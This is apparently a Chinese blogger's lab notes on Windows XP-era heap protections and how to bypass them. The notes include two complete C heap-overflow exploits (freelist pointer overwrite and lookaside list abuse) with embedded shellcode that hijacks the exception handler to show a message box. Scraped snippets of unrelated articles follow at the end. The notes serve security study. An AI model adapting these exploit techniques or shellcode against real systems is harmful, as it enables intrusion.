重重保护下的堆

堆保护机制的原理

  PEB random:在Windows XP SP2之后,将PEB基地址前两个字节随机化。

  Safe Unlink:在SP2 之前的链表拆卸操作类似于如下代码:

  

int remove (ListNode * node)

  (

    node -> blink->flink = node->flink;

    node -> flink->blink = node->blink;

    return 0;

  )

  SP2在进行删除操作时,将提前验证堆块前向指针和后向指针的完整性。

  int safe_remove(ListNode * node)

  (

  if((node->blink->flink==node)&&(node->flink->blink==node))

  (

    node -> blink->flink = node->flink;

    node -> flink->blink = node->blink;

    return 1;

  )

  else

  (

    链表指针被破坏,进入异常

    return 0;

  )

)

  heap cookie:cookie在堆首部分原堆块segment table的位置,占1个字节

  如图所示

  

  元数据加密:微软在WinVista及后续版本的操作系统中开始使用该安全措施。块首一些重要数据在保存时与一个4字节的随机数进行易或运算,使用这些数据时需要再进行一次易或来还原。

2 攻击堆中存储的变量

攻击堆中存储的内容,如重要的数据或结构指针

3 利用chunk重设大小攻击堆

链表发生插入操作:

  1.内存释放后,chunk不再被使用,重新链入链表

  2.chunk内存空间大于申请的空间时,剩余空间会被建立成一个新chunk,链入链表。

  重设chunk的代码

 #include <stdio.h>

 #include <windows.h>
 void main()
 {
 HLOCAL h1;
 HANDLE hp;
 hp = HeapCreate(0,0x1000,0x10000);
 __asm int 3
 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
 }

1.查看 堆、FreeList[0]的起始位置:

堆的起始地址是0x003A0000

freelist[0]

明天继续

2017-8-9

将新chunk插入链表,修改chunk中下一chunk指针和上一chunk指针的开始

和我在博客上看到的一样,基址是7c920000+11513

7C931513 代码不对

按命令找

书里面很绕,按照博客里的说法,我们将旧chunk的Flink和Blink覆盖掉可能出现漏洞。

也就是说能找到旧chunk的Flink和Blink,然后覆盖掉就可能出现漏洞。

代码(根据环境,将39改为3A啦)

#include <stdio.h>
#include <windows.h>
 void main()
 {
 char shellcode[]=
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x10\x01\x10\x00\x99\x99\x99\x99"
 "\xEB\x06\x39\x00\xEB\x06\x39\x00"
 "\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\xEB\x31\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
 "\x11\x01\x10\x00\x99\x99\x99\x99\x8C\x06\x39\x00\xE4\xFF\x12\x00"
 "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
 "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
 "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
 "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
 "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
 "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
 "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
 "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
 "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
 "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
 "\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
 ;
 HLOCAL h1,h2;
 HANDLE hp;
 hp = HeapCreate(0,0x1000,0x10000);
 __asm int 3
 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
 memcpy(h1,shellcode,300);
 h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
 int zero=0;
 zero=1/zero;
 printf("%d",zero);
 }

在memcpy处下断点

看到32字节的字符串,可以覆盖Flink和Blink了

原理在0day里讲的很清楚了

接下来需要修改的目标是异常处理,默认异常处理句柄的位置在0012FFE4

第一次实验,失败告终,T-T.(第二次实验,成功啦)和预期一致

得到的结果应该是

[003A06B8]=003A06EB

[003A06B8+4]=0012FFE4

[0012FFE4]=003A06B8

[003A06EB+4]=003A06B8

实验最后一步:布置可以弹出对话框的shellcode

代码布局如图所示

成功进入最终的异常处理程序执行

流程知道了,接下来调试调试,看看内部结构

在0x003906B8处中断,成功劫持程序流程

按F9 直接运行,出现failwest对话框

2 利用Lookaside表进行堆溢出

  快表中单链表拆卸时没有验证

  思路

  

代码

#include <stdio.h>
#include <windows.h>
void main()
{
char shellcode []=
"\xEB\x40\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
"\x03\00\x03\x00\x5C\x01\x08\x99"//填充
"\xE4\xFF\x12\x00"//用默认异常处理函数指针所在位置覆盖
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"//填充
"\x90\x90\x90\x90"
"\xE4\xFF\x12\x00"
"\x90\x90\x90\x90\x90\x90\x90\x90"//填充
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//填充
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
;
HLOCAL h1,h2,h3;
HANDLE hp;
hp = HeapCreate(0,0,0);
//__asm int 3
h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
HeapFree(hp,0,h2);
HeapFree(hp,0,h3);
memcpy(h1,shellcode,300);
h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
memcpy(h3,"\x90\x1E\x3A\x00",4);
int zero=0;
zero=1/zero;
printf("%d",zero);
}

快表是什么?忘了,,先补一补,补充完毕

都是16字节

看看普通的堆块

空的

因为快表都是空的,我们先申请再释放,就优先释放到快表里,此外

此处申请的也是快表

查看指向下一堆块的指针

可以看出释放掉的两个堆都链进块表里了,lookaside->node[2]->node[1]

而node[1]就在h1之后,此处和博客里面做的实验结果有些不一样,需要覆盖掉

003A1EC0处的指针

稍微做修改后,成功

时间: 2024-08-30 10:15:19

重重保护下的堆的相关文章

dijkstra(最短路)和Prim(最小生成树)下的堆优化

最小堆: down(i)[向下调整]:从第k层的点i开始向下操作,第k层的点与第k+1层的点(如果有)进行值大小的判断,如果父节点的值大于子节点的值,则修改,并继续对第k+1层与第k+2层的点进行判断和修改,否则不修改,且退出.当点向下移动到树的最后一层,没有子节点供判断与修改,停止操作. 树最多有log(n) 层[log(n)=log2n,一般省略数字2],时间复杂度log(n)次. up(i)[向上调整]:同理,时间复杂度log(n)次. 1.求n个数进行排序: I.建树(n/2次down)

数据结构--树(下)--堆

堆 这里的堆不是堆栈,排队不完全按照时间的先后顺序,有优先的级别.排队的原则有哪些? 优先队列:特殊的“队列”,取出元素的顺序是依照元素的优先权(关键字)大小,而不是元素进入队列 的先后顺序. 那么怎么实现优先队列呢?数组或者是链表?见下图 是否可以用二叉树存储结构? 二叉搜索树?  查找和删除都是树的高度log2n,可能一直删除最大值,但是删除几次之后,我们就不用查找树,搜索树. 还有别的方法吗? 那我们怎么组织二叉树呢? 最好的 方法就是用完全二叉树.堆最大的特点就是用完全二叉树,任何一个节

微信春晚红包的10亿个红包,到底难在哪儿?

4800倍的挑战 今年微信红包方式与去年用户与用户之间互发红包相比,摇红包的方式对业务量来说是一个极大的爆发,光是除夕10:30送出的一波红包就达到了1.2亿个,已经是2014年除夕夜峰值的4800倍之巨(2014年峰值每分钟被拆开红包数量仅2.5W个)!发10亿红包,难在哪里? 微信团队总结下来有三大难点:快——如何保证用户快速摇到红包?准——如何保证摇到的红包能成功拆开?稳——如何保证拆开的红包能分享出去? 大量用户在同一时间摇红包,瞬间产生每秒千万级的请求,这个量级的请求如果不加以疏导处理

Windows环境下堆管理系统的快表介绍

实验环境: 操作系统: Windows 2000 Service Pack 4 集成开发环境: Microsoft Visual C++ 6.0 SP6 构建版本:Release版本 实验代码: 1 #include <stdio.h> 2 #include <windows.h> 3 4 void main() 5 { 6 HLOCAL h1, h2, h3, h4; 7 HANDLE hp; 8 9 // 启用快表 10 hp = HeapCreate(0, 0, 0); 11

浅谈堆和栈的区别

笔者作为一个小白,对于堆和栈的概念,总是感觉很朦胧,他们认识我,而我只是偶尔见过,并没有深交 然而在计算机领域,堆栈是一个不容忽视的概念,堆栈是 两种数据结构.堆栈都是一种数据项按序排列的数据结构,只能在一端(称为栈顶(top))对数据项进行插入和删除.在单片机应用中,堆栈是个特殊的存储 区,主要功能是暂时存放数据和地址,通常用来保护断点和现场.要点:堆,队列优先,先进先出(FIFO—first in first out).栈,先进后出(FILO—First-In/Last-Out). 一般情况

关于堆和栈的那些事

问题描述 编程语言书籍中经常解释值类型被创建在栈上,引用类型被创建在堆上,但是并没有本质上解释这堆和栈是什么.我仅有高级语言编程经验,没有看过对此更清晰的解释.我的意思是我理解什么是栈,但是它们到底是什么,在哪儿呢(站在实际的计算机物理内存的角度上看)? 在通常情况下由操作系统(OS)和语言的运行时(runtime)控制吗? 它们的作用范围是什么? 它们的大小由什么决定? 哪个更快? 答案一 栈是为执行线程留出的内存空间.当函数被调用的时候,栈顶为局部变量和一些 bookkeeping 数据预留

堆区和栈区的区别

堆和栈的区别一.预备知识—程序的内存分配一个由c/C++编译的程序占用的内存分为以下几个部分1.栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等.其操作方式类似于数据结构中的栈.2.堆区(heap) — 一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 .注意它与数据结构中的堆是两回事,分配方式倒是类似于链表,呵呵.3.全局区(静态区)(static)—,全局变量和静态变量的存储是放在一块的,初始化的全局变量和静态变量在一块区域, 未初始化的全局变量

[c++]堆和栈的区别

堆和栈的区别一.预备知识-程序的内存分配一个由c/C++编译的程序占用的内存分为以下几个部分1.栈区(stack)- 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等.其操作方式类似于数据结构中的栈.2.堆区(heap) - 一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 .注意它与数据结构中的堆是两回事,分配方式倒是类似于链表,呵呵.3.全局区(静态区)(static)-,全局变量和静态变量的存储是放在一块的,初始化的全局变量和静态变量在一块区域, 未初始化的全局变量

什么是堆和栈

问题描述 编程语言书籍中经常解释值类型被创建在栈上,引用类型被创建在堆上,但是并没有本质上解释这堆和栈是什么.我仅有高级语言编程经验,没有看过对此更清晰的解释.我的意思是我理解什么是栈,但是它们到底是什么,在哪儿呢(站在实际的计算机物理内存的角度上看)? 在通常情况下由操作系统(OS)和语言的运行时(runtime)控制吗? 它们的作用范围是什么? 它们的大小由什么决定? 哪个更快? 答案一 栈是为执行线程留出的内存空间.当函数被调用的时候,栈顶为局部变量和一些 bookkeeping 数据预留